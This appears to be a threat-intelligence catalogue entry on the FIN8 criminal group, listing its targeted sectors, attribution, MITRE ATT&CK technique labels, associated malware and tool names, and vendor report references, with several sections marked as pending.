Introduction
FIN8 is a financially motivated threat group that has been active since at least January 2016, and known for targeting organizations in the hospitality, retail, entertainment, insurance, technology, chemical, and financial sectors. In June 2021, security researchers detected FIN8 switching from targeting point-of-sale (POS) devices to distributing a number of ransomware variants. FireEye Obfuscation June 2017 FireEye Fin8 May 2016 Bitdefender Sardonic Aug 2021 Symantec FIN8 Jul 2023
Activities and Tactics
Targeted Sectors: Entertainment, Hospitality, Retail
Country of Origin: 🇷🇺 Russia
Notable Campaigns
Information pending cataloguing.
Tactics, Techniques, and Procedures (TTPs)
- T1078 Valid Accounts
- T1048.003 Exfiltration Over Unencrypted Non-C2 Protocol
- T1033 System Owner/User Discovery
- T1518.001 Security Software Discovery
- T1021.001 Remote Desktop Protocol
- T1003.001 LSASS Memory
- T1588.002 Tool
- T1204.002 Malicious File
- T1588.003 Code Signing Certificates
- T1068 Exploitation for Privilege Escalation
- T1546.003 Windows Management Instrumentation Event Subscription
- T1566.002 Spearphishing Link
- T1053.005 Scheduled Task
- T1204.001 Malicious Link
- T1102 Web Service
- T1027.010 Command Obfuscation
- T1070.004 File Deletion
- T1566.001 Spearphishing Attachment
- T1071.001 Web Protocols
- T1021.002 SMB/Windows Admin Shares
- T1685.005 Clear Windows Event Logs
- T1560.001 Archive via Utility
- T1074.002 Remote Data Staging
- T1105 Ingress Tool Transfer
- T1082 System Information Discovery
- T1059.001 PowerShell
- T1059.003 Windows Command Shell
- T1573.002 Asymmetric Cryptography
- T1055.004 Asynchronous Procedure Call
- T1018 Remote System Discovery
- T1486 Data Encrypted for Impact
- T1482 Domain Trust Discovery
- T1112 Modify Registry
- T1134.001 Token Impersonation/Theft
- T1016.001 Internet Connection Discovery
- T1047 Windows Management Instrumentation
ATT&CK technique IDs (denormalized)
- T1003.001
- T1016.001
- T1018
- T1021.001
- T1021.002
- T1027.010
- T1033
- T1047
- T1048.003
- T1053.005
- T1055.004
- T1059.001
- T1059.003
- T1068
- T1070.004
- T1071.001
- T1074.002
- T1078
- T1082
- T1102
- T1105
- T1112
- T1134.001
- T1204.001
- T1204.002
- T1482
- T1486
- T1518.001
- T1546.003
- T1560.001
- T1566.001
- T1566.002
- T1573.002
- T1588.002
- T1588.003
- T1685.005
Notable Indicators of Compromise (IOCs)
No curated IOCs are currently published for this actor. This section will be updated when stable, attributable indicators are available.
Malware and Tools
- PUNCHBUGGY
- PUNCHTRACK
- PowerSniff:
- PUNCHBUGGY:
- PUNCHTRACK:
- ShellTea:
- BADHATCH:
- PoSlurp:
MITRE ATT&CK Software
- Ping (S0097) — tool
- BADHATCH (S1081) — malware
- PUNCHBUGGY (S0196) — malware
- Ragnar Locker (S0481) — malware
- PUNCHTRACK (S0197) — malware
- dsquery (S0105) — tool
- Net (S0039) — tool
- Nltest (S0359) — tool
- Sardonic (S1085) — malware
- PsExec (S0029) — tool
- Impacket (S0357) — tool
Attribution and Evidence
Country of Origin: Russia Additional attribution information pending cataloguing.
References
[1] mitre-attack [4] FireEye Obfuscation June 2017 Bohannon, D. & Carr N. (2017, June 30). Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February 12, 2018. [5] Bitdefender Sardonic Aug 2021 Budaca, E., et al. (2021, August 25). FIN8 Threat Actor Goes Agile with New Sardonic Backdoor. Retrieved August 9, 2023. [6] FireEye Fin8 May 2016 Kizhakkinan, D., et al. (2016, May 11). Threat Actor Leverages Windows Zero-day Exploit in Payment Card Data Attacks. Retrieved February 12, 2018. [7] Symantec FIN8 Jul 2023 Symantec Threat Hunter Team. (2023, July 18). FIN8 Uses Revamped Sardonic Backdoor to Deliver Noberus Ransomware. Retrieved August 9, 2023.